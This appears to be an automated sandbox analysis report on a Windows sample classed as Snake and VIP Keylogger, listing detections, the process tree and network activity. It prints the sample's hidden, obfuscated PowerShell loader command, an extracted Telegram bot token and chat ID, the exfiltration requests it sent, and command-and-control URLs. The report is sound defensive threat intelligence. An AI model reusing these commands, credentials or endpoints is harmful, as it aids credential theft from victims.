Edit tour

Windows Analysis Report
lkETeneRL3.exe

Overview

General Information

Sample name:	lkETeneRL3.exe renamed because original name is a hash value
Original sample name:	f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba.exe
Analysis ID:	1588867
MD5:	21eb0bfd14e8ab29a3c29d5b60ee09e1
SHA1:	9cff284042166495e20428500545b99330a1a9c8
SHA256:	f459c492671666638899a5c5d716538ecff3516338e5cea64e5d53fa421ec2ba
Tags:	exesigneduser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

lkETeneRL3.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\lkETeneRL3.exe" MD5: 21EB0BFD14E8AB29A3C29D5B60EE09E1)

powershell.exe (PID: 7708 cmdline: powershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7376 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7808466522:AAFleMCkdYBjkW3SQRMH5osM11THNEIFjRA", "Chat_id": "7161037710", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2582989409.0000000021733000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: msiexec.exe PID: 7376	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7376	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 216.58.206.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7376, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49976

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 151.80.4.227, DestinationIsIpv6: false, DestinationPort: 465, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7376, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49996

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) ", CommandLine: powershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lkETeneRL3.exe", ParentImage: C:\Users\user\Desktop\lkETeneRL3.exe, ParentProcessId: 7640, ParentProcessName: lkETeneRL3.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) ", ProcessId: 7708, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T06:31:38.167637+0100	2803305	3	Unknown Traffic	192.168.2.7	49980	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T06:31:36.462774+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49978	158.101.44.242	80	TCP
2025-01-11T06:31:37.587764+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49978	158.101.44.242	80	TCP
2025-01-11T06:31:38.744256+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49981	158.101.44.242	80	TCP
2025-01-11T06:31:41.275358+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49985	158.101.44.242	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T06:31:31.506270+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49976	216.58.206.78	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T06:31:47.956669+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49995	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7808466522:AAFleMCkdYBjkW3SQRMH5osM11THNEIFjRA", "Chat_id": "7161037710", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: lkETeneRL3.exe	ReversingLabs: Detection: 57%
Source: lkETeneRL3.exe	Virustotal: Detection: 71%			Perma Link

Machine Learning detection for sample

Source: lkETeneRL3.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: lkETeneRL3.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49979 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49995 version: TLS 1.2

Source: lkETeneRL3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\lkETeneRL3.exe	Code function: 1_2_00406167 FindFirstFileA,FindClose,	1_2_00406167
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Code function: 1_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_00405705
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Code function: 1_2_00402688 FindFirstFileA,	1_2_00402688

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 004CF45Dh	6_2_004CF2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 004CF45Dh	6_2_004CF4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 004CFC19h	6_2_004CF961

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49995 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2011/01/2025%20/%2014:41:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49985 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49981 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49978 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49980 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49976 -> 216.58.206.78:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1z0zocG9mm2e8uBZPCbcJgrO6W2Ot3dcm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1z0zocG9mm2e8uBZPCbcJgrO6W2Ot3dcm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49979 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1z0zocG9mm2e8uBZPCbcJgrO6W2Ot3dcm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1z0zocG9mm2e8uBZPCbcJgrO6W2Ot3dcm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2011/01/2025%20/%2014:41:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.jovannovicvoce.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 05:31:47 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000006.00000002.2582989409.0000000021733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000006.00000002.2582989409.00000000215FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2029301268.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros0s
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021743000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jovannovicvoce.com
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021743000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.0000000021733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.jovannovicvoce.com
Source: lkETeneRL3.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: lkETeneRL3.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000006.00000002.2582989409.00000000216D7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.0000000021708000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.2582989409.00000000216D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: msiexec.exe, 00000006.00000002.2571166277.0000000005AEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.2571166277.0000000005AEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582196536.0000000020A90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1z0zocG9mm2e8uBZPCbcJgrO6W2Ot3dcm
Source: msiexec.exe, 00000006.00000002.2571166277.0000000005AEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1z0zocG9mm2e8uBZPCbcJgrO6W2Ot3dcm.a
Source: msiexec.exe, 00000006.00000003.2029301268.0000000005B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2571166277.0000000005B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2571166277.0000000005AEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1z0zocG9mm2e8uBZPCbcJgrO6W2Ot3dcm&export=download
Source: msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.00000000215FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.000000002158D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.2582989409.000000002158D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.2582989409.00000000215B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021626000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.00000000215FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.00000000215B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
